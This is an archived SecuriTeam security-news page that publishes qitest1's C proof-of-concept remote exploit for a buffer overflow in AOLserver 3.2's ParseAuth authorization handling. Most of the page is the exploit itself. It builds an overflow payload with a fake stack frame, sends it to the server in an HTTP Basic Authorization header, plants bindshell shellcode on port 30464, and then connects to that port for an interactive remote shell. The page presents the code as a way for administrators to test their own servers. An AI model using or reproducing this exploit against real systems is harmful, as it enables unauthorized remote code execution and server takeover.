SecuriTeam - AOLserver Exploit Code Released (ParseAuth)

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

AOLserver contains an exploitable buffer overflow as we reported in our previous article: AOLserver Authorization Buffer Overflow. The following is an exploit code that can be used by administrators to determine whether you are vulnerable.

Credit:
The information has been provided by qitest1.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable systems:
AOLserver version 3.2 and prior

Immune systems:
AOLserver version 3.4 and above

Exploit:
/*
* AOLserver version 3.2 and prior Linux x86 remote exploit
* by qitest1 - Wed Sep 5 17:20:10 CEST 2001
*
* Proof of concept code for exploiting the bof in ParseAuth(). I
* used this vuln as a playground for some tests, all done on a RH6.2
* box. The fp will be overwritten by a pointer to a fake frame, with
* an fp and an eip pointing to the shellcode. Very unstable, segfault
* in most cases.
*
* Greets: grazer and the other hot guys on #!digit-labs
* teleh0r: come back home fratello! =)
*
* ..harder times for 0x69, now at http://digit-labs.org/qitest1..
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>

#define EIP_POS 260
#define SC_ADDR 0xbf1ff9a8
#define FP 0xbf1ff9a0
#define FAKE_FP 0xbf1ffaf4

  char shellcode[] = /* Taeho Oh bindshell code at port 30464 */
  "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
  "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
  "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
  "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
  "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
  "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
  "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
  "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
  "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
  "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
  "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
  "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

  int sockami(char *host, int port);
  void shellami(int sock);
  void zbuffami(u_long fp, u_long sc_addr, char *zbuf);
  int Ns_HtuuEncode(unsigned char *bufin,
unsigned int nbytes,
char * bufcoded);

int
main(int argc, char **argv)
{
  int sock;
  char zbuf[1024], ubuf[1024], sbuf[1024];

  printf("\n AOLserver version 3.3 and prior exploit by qitest1\n\n");

  if(argc == 1)
{
fprintf(stderr, "Usage: %s <target>\n", argv[0]);
exit(1);
}

  printf("+Connecting to %s...\n", argv[1]);
  sock = sockami(argv[1], 80);
  printf(" connected\n");

  printf("+Building buffer with shellcode len: %d...\n",
  strlen(shellcode));
  memset(zbuf, 0x00, sizeof(zbuf));
  zbuffami(FP, SC_ADDR, zbuf);
  printf(" done\n");

  printf("+Encoding buffer...\n");
  memset(ubuf, 0x00, sizeof(ubuf));
  Ns_HtuuEncode(zbuf, strlen(zbuf), ubuf);
  printf(" done\n");

  printf("+Making http request...\n");
  sprintf(sbuf,
  "GET / HTTP/1.0\nAuthorization: Basic %s\r\n\r\n", ubuf);
  send(sock, sbuf, strlen(sbuf), 0);
  printf(" done\n");

  printf("+Waiting for the shellcode to be executed...\n 0x69\n");
  sleep(2);
  sock = sockami(argv[1], 30464);
  shellami(sock);
}

int
sockami(char *host, int port)
{
  struct sockaddr_in address;
  struct hostent *hp;
  int sock;

  sock = socket(AF_INET, SOCK_STREAM, 0);
  if(sock == -1)
        {
          perror("socket()");
          exit(-1);
        }

  hp = gethostbyname(host);
  if(hp == NULL)
        {
          perror("gethostbyname()");
          exit(-1);
        }

  memset(&address, 0, sizeof(address));
  memcpy((char *) &address.sin_addr, hp->h_addr, hp->h_length);
  address.sin_family = AF_INET;
  address.sin_port = htons(port);

  if(connect(sock, (struct sockaddr *) &address, sizeof(address)) == -1)
        {
          perror("connect()");
          exit(-1);
        }

  return(sock);
}

void
shellami(int sock)
{
  int n;
  char recvbuf[1024], *cmd = "id; uname -a\n";
  fd_set rset;

  send(sock, cmd, strlen(cmd), 0);

  while (1)
    {
      FD_ZERO(&rset);
      FD_SET(sock, &rset);
      FD_SET(STDIN_FILENO, &rset);
      select(sock+1, &rset, NULL, NULL, NULL);
      if(FD_ISSET(sock, &rset))
        {
          n = read(sock, recvbuf, 1024);
          if (n <= 0)
            {
              printf("Connection closed by foreign host.\n");
              exit(0);
            }
          recvbuf[n] = 0;
          printf("%s", recvbuf);
        }
      if (FD_ISSET(STDIN_FILENO, &rset))
        {
          n = read(STDIN_FILENO, recvbuf, 1024);
          if (n > 0)
            {
              recvbuf[n] = 0;
              write(sock, recvbuf, n);
            }
        }
    }
  return;
}

void
zbuffami(u_long fp, u_long sc_addr, char *zbuf)
{
  int i, n = 0;

  for(i = 0; i < EIP_POS; i++)
zbuf[i] = 0x90;

  /* Fake frame...
   */
  zbuf[0] = (u_char) (FAKE_FP & 0x000000ff);
  zbuf[1] = (u_char)((FAKE_FP & 0x0000ff00) >> 8);
  zbuf[2] = (u_char)((FAKE_FP & 0x00ff0000) >> 16);
  zbuf[3] = (u_char)((FAKE_FP & 0xff000000) >> 24);

  zbuf[4] = (u_char) (sc_addr & 0x000000ff);
  zbuf[5] = (u_char)((sc_addr & 0x0000ff00) >> 8);
  zbuf[6] = (u_char)((sc_addr & 0x00ff0000) >> 16);
  zbuf[7] = (u_char)((sc_addr & 0xff000000) >> 24);

  for(i = EIP_POS - 4 - strlen(shellcode) - 8; i < EIP_POS - 4 - 8; i++)
        zbuf[i] = shellcode[n++];

  /* Padding...
   */
  for(n = 0; n < 8 ; n++)
        zbuf[i++] = 0x69;

  zbuf[EIP_POS - 4] = (u_char) (fp & 0x000000ff);
  zbuf[EIP_POS - 3] = (u_char)((fp & 0x0000ff00) >> 8);
  zbuf[EIP_POS - 2] = (u_char)((fp & 0x00ff0000) >> 16);
  zbuf[EIP_POS - 1] = (u_char)((fp & 0xff000000) >> 24);

  zbuf[EIP_POS] = 0x00;

  /* Extra junk
   */
  for(i = 0; i < 4; i++)
strcat(zbuf, "\x69\x69\x69\x69");

  return;
}

  static char six2pr[64] =
{
    'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
    'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
    'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
    '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/'
};

  static unsigned char pr2six[256];

  /* qitest1 and the pleasure of reading... ;pP
   * This routine converts a buffer of bytes to/from RFC 1113
   * printable encoding format.
   * This technique is similar to the familiar Unix uuencode format
   * in that it maps 6 binary bits to one ASCII character (or more
   * aptly, 3 binary bytes to 4 ASCII characters). However, RFC 1113
   * does not use the same mapping to printable characters as uuencode.
   *
   * Mark Riordan 12 August 1990 and 17 Feb 1991.
   * This code is hereby placed in the public domain.
   *
   * Encode a single line of binary data to a standard format that
   * uses only printing ASCII characters (but takes up 33% more bytes).
   */
int
Ns_HtuuEncode(unsigned char *bufin, unsigned int nbytes, char * bufcoded)
{

#define ENC(c) six2pr[c]

    register char *outptr = bufcoded;
    unsigned int i;

    for (i = 0; i < nbytes; i += 3) {
                /* c1 */
        *(outptr++) = ENC(*bufin >> 2);
                /* c2 */
        *(outptr++) = ENC(((*bufin << 4) & 060) | ((bufin[1] >> 4) & 017));
                /* c3 */
        *(outptr++) = ENC(((bufin[1] << 2) & 074) | ((bufin[2] >> 6) & 03));
                /* c4 */
        *(outptr++) = ENC(bufin[2] & 077);

        bufin += 3;
    }

    /*
     * If nbytes was not a multiple of 3, then we have encoded too many
     * characters. Adjust appropriately.
     */
    if (i == nbytes + 1) {
        /* There were only 2 bytes in that last group */
        outptr[-1] = '=';
    } else if (i == nbytes + 2) {
        /* There was only 1 byte in that last group */
        outptr[-1] = '=';
        outptr[-2] = '=';
    }
    *outptr = '\0';
    return (outptr - bufcoded);
}

blog comments powered by Disqus

	Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit
	IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS
	Progea Movicon TCPUploadServer Remote Exploit
	Trango Broadband Wireless Rogue SU Authentication Bug
	Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow
	Family Connections Multiple Remote Vulnerabilities
	VideoCache vccleaner Root Vulnerability
	QuickHeal Antivirus 2010 Local Privilege Escalation
	DubSite CMS Cross Site Request Forgery Vulnerability
	SonicWall Global Management System XSS Vulnerability
	Sonicwall NSA E7500 XSS Vulnerability
	Juniper Security Threat Response Manager XSS Vulnerability
	Hacking CSRF Tokens using CSS History Hack
	Sun Java System Identiy Manager Users Enumeration
	Microsoft Internet Explorer XML Buffer Overflow (Exploit)